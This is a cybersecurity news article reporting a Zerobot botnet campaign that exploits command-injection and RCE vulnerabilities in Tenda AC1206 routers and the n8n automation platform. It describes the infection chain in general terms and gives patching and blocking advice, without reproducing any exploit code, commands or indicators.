A recent surge in malware activity has been identified by cybersecurity experts, revealing a renewed campaign by the Mirai-based botnet known as Zerobot. This campaign is specifically targeting vulnerabilities in Tenda AC1206 routers and the n8n workflow automation platform.
Exploitation of Tenda and n8n Vulnerabilities
Operating under its ninth iteration, zerobotv9, this campaign exploits newly disclosed command injection vulnerabilities to infiltrate exposed networks and devices. Zerobot’s origins trace back to 2022 as a Go-based malware targeting IoT devices. However, its latest version diverges from its predecessor, featuring a smaller, UPX-packed footprint with encrypted strings and a hard-coded command and control (C2) domain.
Research conducted by Akamai has identified active exploitation attempts of these vulnerabilities, captured through their global honeypot network since mid-January 2026. These attempts mark the first confirmed exploitation of these specific CVEs since their disclosure in 2025.
Details of the Vulnerabilities
The key vulnerabilities exploited include CVE-2025-7544, a critical stack-based buffer overflow in Tenda AC1206 devices, and CVE-2025-68613, a critical RCE flaw in n8n’s workflow system. The Tenda vulnerability allows for denial-of-service and remote code execution through improper handling of the deviceList parameter. Meanwhile, the n8n flaw exploits insufficient sandboxing, enabling attackers to execute arbitrary code and access sensitive data.
This campaign’s focus on n8n, alongside traditional IoT hardware, raises significant concerns due to n8n’s role in connecting databases and managing critical systems. A successful breach could facilitate lateral movement within an organization’s infrastructure.
Infection and Defense Strategies
Upon identifying a vulnerable device, Zerobot executes its exploit, compelling the device to download a malicious shell script, tol.sh, from a specific IP address. This script installs the main Zerobot payload, which is compatible with various CPU architectures, reflecting Mirai’s design for broad device compatibility.
The malware employs user-agent strings to evade detection and supports advanced attack methods, surpassing the capabilities of its earlier variants. Additionally, Zerobot targets other known vulnerabilities, employing fallback connection techniques to maintain resilience.
Organizations are urged to update Tenda firmware and n8n versions to mitigate risks. Network defenses should monitor and block identified malicious IPs and the C2 domain, while employing detection rules from Akamai for proactive threat management.
For continuous updates on this evolving threat, follow our coverage and ensure your network defenses are robust against such sophisticated cyber threats.
